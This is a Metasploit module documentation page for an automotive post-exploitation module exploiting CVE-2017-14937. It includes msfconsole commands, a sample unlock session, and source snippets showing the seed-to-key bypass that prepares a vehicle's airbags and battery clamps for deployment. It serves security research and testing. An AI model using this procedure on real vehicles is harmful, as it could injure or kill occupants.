Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.) - Metasploit


This page contains detailed information about how to use the post/hardware/automotive/pdt metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)
Module: post/hardware/automotive/pdt
Source code: modules/post/hardware/automotive/pdt.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Hardware
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-14937

Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module will first query all Pyrotechnic Control Units (PCUs) in the target vehicle to discover how many pyrotechnic devices are present, then attempt to validate the security access token using the default simplified algorithm. On success, the vehicle will be in a state that is prepped to deploy its pyrotechnic devices (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/hardware/automotive/pdt

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/hardware/automotive/pdt
msf post(pdt) > show options
    ... show and set options ...
msf post(pdt) > set SESSION session-id
msf post(pdt) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/hardware/automotive/pdt")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module will first query all Pyrotechnic Control Units (PCUs) in the target vehicle to discover how many pyrotechnic devices are present, then attempt to validate the security access token using the default simplified algorithm. On success, the vehicle will be in a state that is prepped to deploy its pyrotechnic devices (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)

This module is based on research by Johannes Braun and Juergen Duerrwang, which you can read more about here along with related CVE-2017-14937.

Options

SRCID

This is the SRC CAN ID for the PCU connection. Default is 0x7F1.

DSTID

This is the CAN ID of the expected response. Default is 0x7F9.

CANBUS

Determines which CAN bus to communicate on. Type 'supported_buses' for valid options.

PADDING

Optional byte-value to use for padding all CAN bus packets to an 8-byte length. Padding is disabled by default.

Scenarios

A successful unlock and prepped-to-deploy of pyrotechnic devices in a target vehicle:

$ ./msfconsole -q
msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > set uripath /
uripath => /
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module running as background job 0.

[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.0.2.4:8080/
[*] Server started.

msf auxiliary(local_hwbridge) > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-12-17 10:41:27 -0600
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed

msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge >
hwbridge > run post/hardware/automotive/pdt canbus=

[*] Gathering Data...
[*]  VIN: 5555
[*] Loop info (1 pyrotechnic devices):
[*]   69 | battery clamp main battery
[*]      |  Deployment Status: Fail ()
[*]  Number of PCUs in vehicle     | 1
[*]  Info About First PCU
[*]  Address format this PCU(s)    | 11 bit normal addressing
[*]  Number of pyrotechnic charges | 1
[*]  Version of ISO26021 standard  | 1
[*]  ACL type                      | CAN only
[*]  ACL Type version              | 1
[*]
[*] Switching to Diagnostic Session 0x04...
[*] Getting Security Access Seed...
[*] Success.  Seed: ["01", "CF", "00", "00", "00"]
[*] Attempting to unlock device...
[*] Success!
[!] Warning! You are now able to start the deployment of airbags in this vehicle
[!] *** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***

Go back to menu.

Msfconsole Usage

Here is how the hardware/automotive/pdt post exploitation module looks in the msfconsole:

msf6 > use post/hardware/automotive/pdt

msf6 post(hardware/automotive/pdt) > show info

       Name: Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)
     Module: post/hardware/automotive/pdt
   Platform: Hardware
       Arch: 
       Rank: Normal

Provided by:
  Johannes Braun
  Juergen Duerrwang
  Craig Smith

Compatible session types:
  Hwbridge

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CANBUS                    no        CAN Bus to perform scan on, defaults to connected bus
  DSTID    2041             no        Expected reponse ID, defaults to SRCID + 8
  PADDING  0                no        Pad the packet with extra bytes to always be 8 bytes long
  SESSION                   yes       The session to run this module on.
  SRCID    2033             yes       Module ID to query

Description:
  Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), 
  this module will first query all Pyrotechnic Control Units (PCUs) in 
  the target vehicle to discover how many pyrotechnic devices are 
  present, then attempt to validate the security access token using 
  the default simplified algorithm. On success, the vehicle will be in 
  a state that is prepped to deploy its pyrotechnic devices (e.g. 
  airbags, battery clamps, etc.) via the service routine. (ISO 26021)

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-14937
  https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts

Module Options

This is a complete list of options available in the hardware/automotive/pdt post exploitation module:

msf6 post(hardware/automotive/pdt) > show options

Module options (post/hardware/automotive/pdt):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CANBUS                    no        CAN Bus to perform scan on, defaults to connected bus
   DSTID    2041             no        Expected reponse ID, defaults to SRCID + 8
   PADDING  0                no        Pad the packet with extra bytes to always be 8 bytes long
   SESSION                   yes       The session to run this module on.
   SRCID    2033             yes       Module ID to query

Advanced Options

Here is a complete list of advanced options supported by the hardware/automotive/pdt post exploitation module:

msf6 post(hardware/automotive/pdt) > show advanced

Module advanced options (post/hardware/automotive/pdt):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the hardware/automotive/pdt module can do:

msf6 post(hardware/automotive/pdt) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the hardware/automotive/pdt post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(hardware/automotive/pdt) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

error

Here is a relevant code snippet related to the "error" error message:

259:	    print_status(" ACL type                      | #{ACL_TYPES[acl_type_definition.hex]}")
260:	    print_status(" ACL Type version              | #{acl_type_version.hex}")
261:	    print_status
262:	    print_status('Switching to Diagnostic Session 0x04...')
263:	    resp = set_dsc(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x04, opt)
264:	    if resp.key? 'error'
265:	      print_error("Could not switch to DSC 0x04: #{resp['error']}")
266:	      return
267:	    end
268:	    # We may not need tester present at all because we will perform the action quickly
269:	    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)

Could not switch to DSC 0x04: <ERROR>

Here is a relevant code snippet related to the "Could not switch to DSC 0x04: <ERROR>" error message:

260:	    print_status(" ACL Type version              | #{acl_type_version.hex}")
261:	    print_status
262:	    print_status('Switching to Diagnostic Session 0x04...')
263:	    resp = set_dsc(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x04, opt)
264:	    if resp.key? 'error'
265:	      print_error("Could not switch to DSC 0x04: #{resp['error']}")
266:	      return
267:	    end
268:	    # We may not need tester present at all because we will perform the action quickly
269:	    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
270:	    print_status('Getting Security Access Seed...')

error

Here is a relevant code snippet related to the "error" error message:

267:	    end
268:	    # We may not need tester present at all because we will perform the action quickly
269:	    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
270:	    print_status('Getting Security Access Seed...')
271:	    seed = get_security_token(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x5F, opt)
272:	    if seed.key? 'error'
273:	       print_error("Couldn't get seed: #{seed['error']}")
274:	       return
275:	    end
276:	    print_status("Success.  Seed: #{seed['SEED']}")
277:	    print_status('Attempting to unlock device...')

Couldn't get seed: <ERROR>

Here is a relevant code snippet related to the "Couldn't get seed: <ERROR>" error message:

268:	    # We may not need tester present at all because we will perform the action quickly
269:	    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
270:	    print_status('Getting Security Access Seed...')
271:	    seed = get_security_token(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x5F, opt)
272:	    if seed.key? 'error'
273:	       print_error("Couldn't get seed: #{seed['error']}")
274:	       return
275:	    end
276:	    print_status("Success.  Seed: #{seed['SEED']}")
277:	    print_status('Attempting to unlock device...')
278:	    display_warning = false

error

Here is a relevant code snippet related to the "error" error message:

280:	      print_status('Security Access Already Unlocked!!')
281:	      display_warning = true
282:	    else
283:	      key = [0xFF - seed['SEED'][0].hex, 0xFF - seed['SEED'][1].hex]
284:	      resp = send_security_token_response(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], key, 0x60, opt)
285:	      if (resp.key? 'error') && !(resp['error'].key? 'RCRRP')
286:	        print_error("Invalid SA Response.  System not vulnerable. Error: #{resp['error']}")
287:	        return
288:	      end
289:	      found_valid = false
290:	      if (resp.key? 'Packets') && resp['Packets'].size > 0

Invalid SA Response. System not vulnerable. Error: <ERROR>

Here is a relevant code snippet related to the "Invalid SA Response. System not vulnerable. Error: <ERROR>" error message:

281:	      display_warning = true
282:	    else
283:	      key = [0xFF - seed['SEED'][0].hex, 0xFF - seed['SEED'][1].hex]
284:	      resp = send_security_token_response(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], key, 0x60, opt)
285:	      if (resp.key? 'error') && !(resp['error'].key? 'RCRRP')
286:	        print_error("Invalid SA Response.  System not vulnerable. Error: #{resp['error']}")
287:	        return
288:	      end
289:	      found_valid = false
290:	      if (resp.key? 'Packets') && resp['Packets'].size > 0
291:	        resp['Packets'].each do |i|

Unknown response: <RESP.INSPECT>

Here is a relevant code snippet related to the "Unknown response: <RESP.INSPECT>" error message:

294:	      end
295:	      if found_valid
296:	        print_status('Success!')
297:	        display_warning = true
298:	      else
299:	        print_error("Unknown response: #{resp.inspect}")
300:	      end
301:	    end
302:	    if display_warning
303:	      print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
304:	      print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')

Warning! You are now able to start the deployment of airbags in this vehicle

Here is a relevant code snippet related to the "Warning! You are now able to start the deployment of airbags in this vehicle" error message:

298:	      else
299:	        print_error("Unknown response: #{resp.inspect}")
300:	      end
301:	    end
302:	    if display_warning
303:	      print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
304:	      print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
305:	    end
306:	  end
307:	
308:	end

*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***

Here is a relevant code snippet related to the "*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***" error message:

298:	      else
299:	        print_error("Unknown response: #{resp.inspect}")
300:	      end
301:	    end
302:	    if display_warning
303:	      print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
304:	      print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
305:	    end
306:	  end
307:	
308:	end

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Johannes Braun
  • Juergen Duerrwang
  • Craig Smith

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.